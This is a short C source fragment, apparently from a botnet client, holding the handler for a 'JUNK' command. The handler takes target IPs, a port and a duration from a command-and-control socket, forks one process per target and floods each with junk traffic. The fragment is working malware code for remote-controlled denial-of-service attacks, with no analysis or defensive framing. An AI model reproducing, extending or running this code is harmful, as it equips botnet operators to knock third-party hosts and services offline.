		if(!strcmp(argv[0], "JUNK"))
		{
			if(argc < 4 || atoi(argv[2]) < 1 || atoi(argv[3]) < 1)
			{
				//sockprintf(mainCommSock, "JUNK <ip> <port> <time>");
				return;
			}

			unsigned char *ip = argv[1];
			int port = atoi(argv[2]);
			int time = atoi(argv[3]);

			if(strstr(ip, ",") != NULL)
			{
				unsigned char *hi = strtok(ip, ",");
				while(hi != NULL)
				{
					if(!listFork())
					{
						sendJUNK(hi, port, time);
						close(mainCommSock);
						_exit(0);
					}
					hi = strtok(NULL, ",");
				}
			} else {
				if (listFork()) { return; }

				sendJUNK(ip, port, time);
				close(mainCommSock);

				_exit(0);
			}
		}
